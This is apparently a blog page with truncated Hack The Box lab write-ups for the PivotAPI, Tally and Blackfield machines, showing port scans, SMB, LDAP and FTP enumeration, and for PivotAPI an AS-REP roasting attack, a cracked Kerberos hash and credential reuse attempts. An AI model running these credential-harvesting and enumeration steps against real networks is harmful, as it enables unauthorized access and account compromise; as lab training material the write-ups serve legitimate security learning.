Hero Image
[HTB] Machine: PivotAPI

PivotAPI

Enumeration

  • nmap
└─$ nmap -Pn -p- 10.10.10.240 --min-rate 5000                                                                              
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-06 03:10 BST
Nmap scan report for 10.10.10.240 (10.10.10.240)
Host is up (0.10s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49708/tcp open  unknown
52843/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 65.93 seconds

└─$ nmap -Pn -p21,22,53,88,135,139,389,445,464,593,636,1433,3268,3269,9389 -sC -sV 10.10.10.240 --min-rate 5000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-06 03:12 BST
Nmap scan report for 10.10.10.240 (10.10.10.240)
Host is up (0.10s latency).

PORT     STATE    SERVICE       VERSION
21/tcp   open     ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-19-21  03:06PM               103106 10.1.1.414.6453.pdf
| 02-19-21  03:06PM               656029 28475-linux-stack-based-buffer-overflows.pdf
| 02-19-21  12:55PM              1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
| 02-19-21  03:06PM              1018160 ExploitingSoftware-Ch07.pdf
| 08-08-20  01:18PM               219091 notes1.pdf
| 08-08-20  01:34PM               279445 notes2.pdf
| 08-08-20  01:41PM                  105 README.txt
|_02-19-21  03:06PM              1301120 RHUL-MA-2009-06.pdf
22/tcp   open     ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   3072 fa:19:bb:8d:b6:b6:fb:97:7e:17:80:f5:df:fd:7f:d2 (RSA)
|   256 44:d0:8b:cc:0a:4e:cd:2b:de:e8:3a:6e:ae:65:dc:10 (ECDSA)
|_  256 93:bd:b6:e2:36:ce:72:45:6c:1d:46:60:dd:08:6a:44 (ED25519)
53/tcp   open     domain        Simple DNS Plus
88/tcp   open     kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-05 19:12:42Z)
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  filtered ldap
445/tcp  open     microsoft-ds?
464/tcp  filtered kpasswd5
593/tcp  open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open     tcpwrapped
1433/tcp open     ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.10.240:1433: 
|     Target_Name: LICORDEBELLOTA
|     NetBIOS_Domain_Name: LICORDEBELLOTA
|     NetBIOS_Computer_Name: PIVOTAPI
|     DNS_Domain_Name: LicorDeBellota.htb
|     DNS_Computer_Name: PivotAPI.LicorDeBellota.htb
|     DNS_Tree_Name: LicorDeBellota.htb
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|   10.10.10.240:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-05T19:05:41
|_Not valid after:  2053-10-05T19:05:41
|_ssl-date: 2023-10-05T19:13:30+00:00; -7h00m01s from scanner time.
3268/tcp open     ldap          Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
3269/tcp open     tcpwrapped
9389/tcp open     mc-nmf        .NET Message Framing
Service Info: Host: PIVOTAPI; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-10-05T19:12:54
|_  start_date: N/A
|_clock-skew: mean: -7h00m01s, deviation: 0s, median: -7h00m01s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.10 seconds
  • smb
└─$ smbclient -N -L //10.10.10.240                                                              
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.240 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
  • dns
└─$ dig axfr LicorDeBellota.htb @PivotAPI.LicorDeBellota.htb                                                   

; <<>> DiG 9.19.17-1-Debian <<>> axfr LicorDeBellota.htb @PivotAPI.LicorDeBellota.htb
;; global options: +cmd
; Transfer failed.
  • ldapsearch
└─$ ldapsearch -H ldap://LicorDeBellota.htb -x -s base namingcontexts           
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=LicorDeBellota,DC=htb
namingcontexts: CN=Configuration,DC=LicorDeBellota,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=LicorDeBellota,DC=htb
namingcontexts: DC=DomainDnsZones,DC=LicorDeBellota,DC=htb
namingcontexts: DC=ForestDnsZones,DC=LicorDeBellota,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

└─$ ldapsearch -H ldap://LicorDeBellota.htb -x -b "DC=LicorDeBellota,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=LicorDeBellota,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1
  • No results for rpc
  • ftp
└─$ ftp anonymous@10.10.10.240
Connected to 10.10.10.240.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||57367|)
150 Opening ASCII mode data connection.
02-19-21  03:06PM               103106 10.1.1.414.6453.pdf
02-19-21  03:06PM               656029 28475-linux-stack-based-buffer-overflows.pdf
02-19-21  12:55PM              1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
02-19-21  03:06PM              1018160 ExploitingSoftware-Ch07.pdf
08-08-20  01:18PM               219091 notes1.pdf
08-08-20  01:34PM               279445 notes2.pdf
08-08-20  01:41PM                  105 README.txt
02-19-21  03:06PM              1301120 RHUL-MA-2009-06.pdf
226 Transfer complete.
  • Running exiftool on pdf files shows LicorDeBellota.htb\kaorz
======== notes2.pdf
ExifTool Version Number         : 12.67
File Name                       : notes2.pdf
Directory                       : .
File Size                       : 279 kB
File Modification Date/Time     : 2020:08:08 12:34:25+01:00
File Access Date/Time           : 2023:10:06 19:12:03+01:00
File Inode Change Date/Time     : 2023:10:06 19:12:03+01:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 5
XMP Toolkit                     : Image::ExifTool 12.03
Creator                         : Kaorz
Publisher                       : LicorDeBellota.htb
Producer                        : cairo 1.10.2 (http://cairographics.org)

Foothold

  • Let’s check if user is AS-REP-roastable
└─$ impacket-GetNPUsers -dc-ip PivotAPI.LicorDeBellota.htb LicorDeBellota.htb/kaorz -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for kaorz
$krb5asrep$23$kaorz@LICORDEBELLOTA.HTB:117660010b88116ef19ce2f9e608d1d9$a8f47a80fddd556b91bb360af849916358388168cf2ed0c2783c95ff09d799d504477fefe0d1a9ab33a92243939260e558b739cedd2a8c3d61bf85ae56360069cd38a4f14b04865afdbbbf99a3816da14b41058a0249c62c180d50337a6e3c27da5cdde876ca8b4f70f1d5624c1f3358e0a451bb5ec9cb3ee580148951680f5d06f2ce8c11bf61cb8600cbb290dd046a12ad9c8cae68e4ca9706c904189e4ef0a192f8cc192e6286241547ae151111d074323e54a174b945156365f6db2f80d9b7ec558ffa64b7fcd93206f055ecfbf973fa4fff67f20ea88d63fdc29d6aea709c7da2d8073ef9f7fcc3f36a39160138e0679042f7fd8441
  • Let’s crack it
    • kaorz:Roper4155
└─$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-12th Gen Intel(R) Core(TM) i5-12400, 1435/2934 MB (512 MB allocatable), 2MCU
...
$krb5asrep$23$kaorz@LICORDEBELLOTA.HTB:117660010b88116ef19ce2f9e608d1d9$a8f47a80fddd556b91bb360af849916358388168cf2ed0c2783c95ff09d799d504477fefe0d1a9ab33a92243939260e558b739cedd2a8c3d61bf85ae56360069cd38a4f14b04865afdbbbf99a3816da14b41058a0249c62c180d50337a6e3c27da5cdde876ca8b4f70f1d5624c1f3358e0a451bb5ec9cb3ee580148951680f5d06f2ce8c11bf61cb8600cbb290dd046a12ad9c8cae68e4ca9706c904189e4ef0a192f8cc192e6286241547ae151111d074323e54a174b945156365f6db2f80d9b7ec558ffa64b7fcd93206f055ecfbf973fa4fff67f20ea88d63fdc29d6aea709c7da2d8073ef9f7fcc3f36a39160138e0679042f7fd8441:Roper4155
  • The creds didn’t work for ssh
└─$ sshpass -p 'Roper4155' ssh kaorz@10.10.10.240
Warning: Permanently added '10.10.10.240' (ED25519) to the list of known hosts.
Permission denied, please try again.
  • No SPNs
└─$ impacket-GetUserSPNs LicorDeBellota.htb/Kaorz:'Roper4155' -dc-ip 10.10.10.240  
Impacket v0.11.0 - Copyright 2023 Fortra

No entries found!
  • No access to mysql
└─$ impacket-mssqlclient LicorDeBellota.htb/Kaorz:'Roper4155'@10.10.10.240 -windows-auth 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[-] ERROR(PIVOTAPI\SQLEXPRESS): Line 1: Error de inicio de sesión del usuario 'LICORDEBELLOTA\Kaorz'.

User

  • Let’s check bloodhound
└─$ bloodhound-python -u kaorz -p 'Roper4155' -d licordebellota.htb -dc licordebellota.htb -ns 10.10.10.240 --zip
INFO: Found AD domain: licordebellota.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: licordebellota.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Found 28 users
INFO: Connecting to LDAP server: licordebellota.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 58 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: PivotAPI.LicorDeBellota.htb
INFO: Done in 00M 16S
INFO: Compressing output into 20231007112624_bloodhound.zip
  • Nothing interesting
    • Domain Users

Wednesday, October 4, 2023 | 21 minutes Read
Hero Image
[HTB] Machine: Tally

Tally

Enumeration

  • nmap
└─$ nmap -Pn -p- 10.10.10.59 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-30 20:46 BST
Warning: 10.10.10.59 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.59 (10.10.10.59)
Host is up (0.10s latency).
Not shown: 60269 filtered tcp ports (no-response), 5257 closed tcp ports (conn-refused)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
81/tcp    open  hosts2-ns
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
808/tcp   open  ccproxy-http
1433/tcp  open  ms-sql-s
5985/tcp  open  wsman
15567/tcp open  unknown
32843/tcp open  unknown
32844/tcp open  unknown
32846/tcp open  unknown
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 83.60 seconds

└─$ nmap -Pn -p21,80,81,135,139,445,808,1433,5985,15567,32843,32844,32846,47001,49664-49670 -sC -sV 10.10.10.59 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-30 20:51 BST
Nmap scan report for 10.10.10.59 (10.10.10.59)
Host is up (0.10s latency).

PORT      STATE    SERVICE            VERSION
21/tcp    open     ftp                Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open     http               Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
|_http-generator: Microsoft SharePoint
81/tcp    filtered hosts2-ns
135/tcp   open     msrpc              Microsoft Windows RPC
139/tcp   open     netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp   filtered ccproxy-http
1433/tcp  open     ms-sql-s           Microsoft SQL Server 2016 13.00.1601.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-09-30T19:38:29
|_Not valid after:  2053-09-30T19:38:29
| ms-sql-info: 
|   10.10.10.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2023-09-30T19:52:36+00:00; -3s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.10.59:1433: 
|     Target_Name: TALLY
|     NetBIOS_Domain_Name: TALLY
|     NetBIOS_Computer_Name: TALLY
|     DNS_Domain_Name: TALLY
|     DNS_Computer_Name: TALLY
|_    Product_Version: 10.0.14393
5985/tcp  filtered wsman
15567/tcp open     http               Microsoft IIS httpd 10.0
| http-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
32843/tcp open     http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32844/tcp filtered unknown
32846/tcp open     storagecraft-image StorageCraft Image Manager
47001/tcp filtered winrm
49664/tcp filtered unknown
49665/tcp filtered unknown
49666/tcp filtered unknown
49667/tcp filtered unknown
49668/tcp filtered unknown
49669/tcp open     msrpc              Microsoft Windows RPC
49670/tcp open     msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -2s, deviation: 0s, median: -3s
| smb2-time: 
|   date: 2023-09-30T19:52:30
|_  start_date: 2023-09-30T19:38:08

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.85 seconds
  • Web server

Saturday, September 30, 2023 | 10 minutes Read
Hero Image
[HTB] Machine: Blackfield

Blackfield

Enumeration

  • nmap
└─$ nmap -Pn -p- 10.10.10.192 --min-rate 5000 -T4
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 18:54 BST
Nmap scan report for 10.10.10.192 (10.10.10.192)
Host is up (0.11s latency).
Not shown: 65526 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
593/tcp  open  http-rpc-epmap
3268/tcp open  globalcatLDAP
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 35.69 seconds

└─$ nmap -Pn -p53,88,135,389,445,593,3268,5985 -sC -sV 10.10.10.192 --min-rate 5000 -T4
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 18:56 BST
Nmap scan report for 10.10.10.192 (10.10.10.192)
Host is up (0.15s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-18 00:55:30Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h59m20s
| smb2-time: 
|   date: 2023-09-18T00:55:39
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.42 seconds
  • smb
└─$ smbclient -N -L //10.10.10.192                                  

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        profiles$       Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
  • dns
└─$ sudo vim /etc/hosts                                                                                                     
[sudo] password for kali: 
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Documents/tasks]
└─$ dig  @10.10.10.192 BLACKFIELD.local                                                                                     

; <<>> DiG 9.18.16-1-Debian <<>> @10.10.10.192 BLACKFIELD.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 26635
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;BLACKFIELD.local.              IN      A

;; ANSWER SECTION:
BLACKFIELD.local.       600     IN      A       10.10.10.192

;; Query time: 95 msec
;; SERVER: 10.10.10.192#53(10.10.10.192) (UDP)
;; WHEN: Sun Sep 17 19:03:32 BST 2023
;; MSG SIZE  rcvd: 61

└─$ dig axfr @10.10.10.192 BLACKFIELD.local 

; <<>> DiG 9.18.16-1-Debian <<>> axfr @10.10.10.192 BLACKFIELD.local
; (1 server found)
;; global options: +cmd
; Transfer failed.
  • ldap
└─$ ldapsearch -H ldap://10.10.10.192 -x -s base namingcontexts 
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=BLACKFIELD,DC=local
namingcontexts: CN=Configuration,DC=BLACKFIELD,DC=local
namingcontexts: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local
namingcontexts: DC=DomainDnsZones,DC=BLACKFIELD,DC=local
namingcontexts: DC=ForestDnsZones,DC=BLACKFIELD,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

└─$ ldapsearch -H ldap://10.10.10.192 -x -b "DC=BLACKFIELD,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=BLACKFIELD,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1

Foothold

  • smb
└─$ smbclient -N //10.10.10.192/profiles$
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  3 17:47:12 2020
  ..                                  D        0  Wed Jun  3 17:47:12 2020
  AAlleni                             D        0  Wed Jun  3 17:47:11 2020
  ABarteski                           D        0  Wed Jun  3 17:47:11 2020
  ABekesz                             D        0  Wed Jun  3 17:47:11 2020
  ABenzies                            D        0  Wed Jun  3 17:47:11 2020
  ABiemiller                          D        0  Wed Jun  3 17:47:11 2020
  AChampken                           D        0  Wed Jun  3 17:47:11 2020
  ACheretei                           D        0  Wed Jun  3 17:47:11 2020
  ACsonaki                            D        0  Wed Jun  3 17:47:11 2020
  AHigchens                           D        0  Wed Jun  3 17:47:11 2020
  AJaquemai                           D        0  Wed Jun  3 17:47:11 2020
  AKlado                              D        0  Wed Jun  3 17:47:11 2020
  AKoffenburger                       D        0  Wed Jun  3 17:47:11 2020
  AKollolli                           D        0  Wed Jun  3 17:47:11 2020
  AKruppe                             D        0  Wed Jun  3 17:47:11 2020
  AKubale                             D        0  Wed Jun  3 17:47:11 2020
  ALamerz                             D        0  Wed Jun  3 17:47:11 2020
  AMaceldon                           D        0  Wed Jun  3 17:47:11 2020
  AMasalunga                          D        0  Wed Jun  3 17:47:11 2020
  ANavay                              D        0  Wed Jun  3 17:47:11 2020
  ANesterova                          D        0  Wed Jun  3 17:47:11 2020
  ANeusse                             D        0  Wed Jun  3 17:47:11 2020
  AOkleshen                           D        0  Wed Jun  3 17:47:11 2020
  APustulka                           D        0  Wed Jun  3 17:47:11 2020
  ARotella                            D        0  Wed Jun  3 17:47:11 2020
  ASanwardeker                        D        0  Wed Jun  3 17:47:11 2020
  AShadaia                            D        0  Wed Jun  3 17:47:11 2020
  ASischo                             D        0  Wed Jun  3 17:47:11 2020
  ASpruce                             D        0  Wed Jun  3 17:47:11 2020
  ATakach                             D        0  Wed Jun  3 17:47:11 2020
  ATaueg                              D        0  Wed Jun  3 17:47:11 2020
  ATwardowski                         D        0  Wed Jun  3 17:47:11 2020
  audit2020                           D        0  Wed Jun  3 17:47:11 2020
  AWangenheim                         D        0  Wed Jun  3 17:47:11 2020
  AWorsey                             D        0  Wed Jun  3 17:47:11 2020
  AZigmunt                            D        0  Wed Jun  3 17:47:11 2020
  BBakajza                            D        0  Wed Jun  3 17:47:11 2020
  BBeloucif                           D        0  Wed Jun  3 17:47:11 2020
  BCarmitcheal                        D        0  Wed Jun  3 17:47:11 2020
  BConsultant                         D        0  Wed Jun  3 17:47:11 2020
  BErdossy                            D        0  Wed Jun  3 17:47:11 2020
  BGeminski                           D        0  Wed Jun  3 17:47:11 2020
  BLostal                             D        0  Wed Jun  3 17:47:11 2020
  BMannise                            D        0  Wed Jun  3 17:47:11 2020
  BNovrotsky                          D        0  Wed Jun  3 17:47:11 2020
  BRigiero                            D        0  Wed Jun  3 17:47:11 2020
  BSamkoses                           D        0  Wed Jun  3 17:47:11 2020
  BZandonella                         D        0  Wed Jun  3 17:47:11 2020
  CAcherman                           D        0  Wed Jun  3 17:47:12 2020
  CAkbari                             D        0  Wed Jun  3 17:47:12 2020
  CAldhowaihi                         D        0  Wed Jun  3 17:47:12 2020
  CArgyropolous                       D        0  Wed Jun  3 17:47:12 2020
  CDufrasne                           D        0  Wed Jun  3 17:47:12 2020
  CGronk                              D        0  Wed Jun  3 17:47:11 2020
  Chiucarello                         D        0  Wed Jun  3 17:47:11 2020
  Chiuccariello                       D        0  Wed Jun  3 17:47:12 2020
  CHoytal                             D        0  Wed Jun  3 17:47:12 2020
  CKijauskas                          D        0  Wed Jun  3 17:47:12 2020
  CKolbo                              D        0  Wed Jun  3 17:47:12 2020
  CMakutenas                          D        0  Wed Jun  3 17:47:12 2020
  CMorcillo                           D        0  Wed Jun  3 17:47:11 2020
  CSchandall                          D        0  Wed Jun  3 17:47:12 2020
  CSelters                            D        0  Wed Jun  3 17:47:12 2020
  CTolmie                             D        0  Wed Jun  3 17:47:12 2020
  DCecere                             D        0  Wed Jun  3 17:47:12 2020
  DChintalapalli                      D        0  Wed Jun  3 17:47:12 2020
  DCwilich                            D        0  Wed Jun  3 17:47:12 2020
  DGarbatiuc                          D        0  Wed Jun  3 17:47:12 2020
  DKemesies                           D        0  Wed Jun  3 17:47:12 2020
  DMatuka                             D        0  Wed Jun  3 17:47:12 2020
  DMedeme                             D        0  Wed Jun  3 17:47:12 2020
  DMeherek                            D        0  Wed Jun  3 17:47:12 2020
  DMetych                             D        0  Wed Jun  3 17:47:12 2020
  DPaskalev                           D        0  Wed Jun  3 17:47:12 2020
  DPriporov                           D        0  Wed Jun  3 17:47:12 2020
  DRusanovskaya                       D        0  Wed Jun  3 17:47:12 2020
  DVellela                            D        0  Wed Jun  3 17:47:12 2020
  DVogleson                           D        0  Wed Jun  3 17:47:12 2020
  DZwinak                             D        0  Wed Jun  3 17:47:12 2020
  EBoley                              D        0  Wed Jun  3 17:47:12 2020
  EEulau                              D        0  Wed Jun  3 17:47:12 2020
  EFeatherling                        D        0  Wed Jun  3 17:47:12 2020
  EFrixione                           D        0  Wed Jun  3 17:47:12 2020
  EJenorik                            D        0  Wed Jun  3 17:47:12 2020
  EKmilanovic                         D        0  Wed Jun  3 17:47:12 2020
  ElKatkowsky                         D        0  Wed Jun  3 17:47:12 2020
  EmaCaratenuto                       D        0  Wed Jun  3 17:47:12 2020
  EPalislamovic                       D        0  Wed Jun  3 17:47:12 2020
  EPryar                              D        0  Wed Jun  3 17:47:12 2020
  ESachhitello                        D        0  Wed Jun  3 17:47:12 2020
  ESariotti                           D        0  Wed Jun  3 17:47:12 2020
  ETurgano                            D        0  Wed Jun  3 17:47:12 2020
  EWojtila                            D        0  Wed Jun  3 17:47:12 2020
  FAlirezai                           D        0  Wed Jun  3 17:47:12 2020
  FBaldwind                           D        0  Wed Jun  3 17:47:12 2020
  FBroj                               D        0  Wed Jun  3 17:47:12 2020
  FDeblaquire                         D        0  Wed Jun  3 17:47:12 2020
  FDegeorgio                          D        0  Wed Jun  3 17:47:12 2020
  FianLaginja                         D        0  Wed Jun  3 17:47:12 2020
  FLasokowski                         D        0  Wed Jun  3 17:47:12 2020
  FPflum                              D        0  Wed Jun  3 17:47:12 2020
  FReffey                             D        0  Wed Jun  3 17:47:12 2020
  GaBelithe                           D        0  Wed Jun  3 17:47:12 2020
  Gareld                              D        0  Wed Jun  3 17:47:12 2020
  GBatowski                           D        0  Wed Jun  3 17:47:12 2020
  GForshalger                         D        0  Wed Jun  3 17:47:12 2020
  GGomane                             D        0  Wed Jun  3 17:47:12 2020
  GHisek                              D        0  Wed Jun  3 17:47:12 2020
  GMaroufkhani                        D        0  Wed Jun  3 17:47:12 2020
  GMerewether                         D        0  Wed Jun  3 17:47:12 2020
  GQuinniey                           D        0  Wed Jun  3 17:47:12 2020
  GRoswurm                            D        0  Wed Jun  3 17:47:12 2020
  GWiegard                            D        0  Wed Jun  3 17:47:12 2020
  HBlaziewske                         D        0  Wed Jun  3 17:47:12 2020
  HColantino                          D        0  Wed Jun  3 17:47:12 2020
  HConforto                           D        0  Wed Jun  3 17:47:12 2020
  HCunnally                           D        0  Wed Jun  3 17:47:12 2020
  HGougen                             D        0  Wed Jun  3 17:47:12 2020
  HKostova                            D        0  Wed Jun  3 17:47:12 2020
  IChristijr                          D        0  Wed Jun  3 17:47:12 2020
  IKoledo                             D        0  Wed Jun  3 17:47:12 2020
  IKotecky                            D        0  Wed Jun  3 17:47:12 2020
  ISantosi                            D        0  Wed Jun  3 17:47:12 2020
  JAngvall                            D        0  Wed Jun  3 17:47:12 2020
  JBehmoiras                          D        0  Wed Jun  3 17:47:12 2020
  JDanten                             D        0  Wed Jun  3 17:47:12 2020
  JDjouka                             D        0  Wed Jun  3 17:47:12 2020
  JKondziola                          D        0  Wed Jun  3 17:47:12 2020
  JLeytushsenior                      D        0  Wed Jun  3 17:47:12 2020
  JLuthner                            D        0  Wed Jun  3 17:47:12 2020
  JMoorehendrickson                   D        0  Wed Jun  3 17:47:12 2020
  JPistachio                          D        0  Wed Jun  3 17:47:12 2020
  JScima                              D        0  Wed Jun  3 17:47:12 2020
  JSebaali                            D        0  Wed Jun  3 17:47:12 2020
  JShoenherr                          D        0  Wed Jun  3 17:47:12 2020
  JShuselvt                           D        0  Wed Jun  3 17:47:12 2020
  KAmavisca                           D        0  Wed Jun  3 17:47:12 2020
  KAtolikian                          D        0  Wed Jun  3 17:47:12 2020
  KBrokinn                            D        0  Wed Jun  3 17:47:12 2020
  KCockeril                           D        0  Wed Jun  3 17:47:12 2020
  KColtart                            D        0  Wed Jun  3 17:47:12 2020
  KCyster                             D        0  Wed Jun  3 17:47:12 2020
  KDorney                             D        0  Wed Jun  3 17:47:12 2020
  KKoesno                             D        0  Wed Jun  3 17:47:12 2020
  KLangfur                            D        0  Wed Jun  3 17:47:12 2020
  KMahalik                            D        0  Wed Jun  3 17:47:12 2020
  KMasloch                            D        0  Wed Jun  3 17:47:12 2020
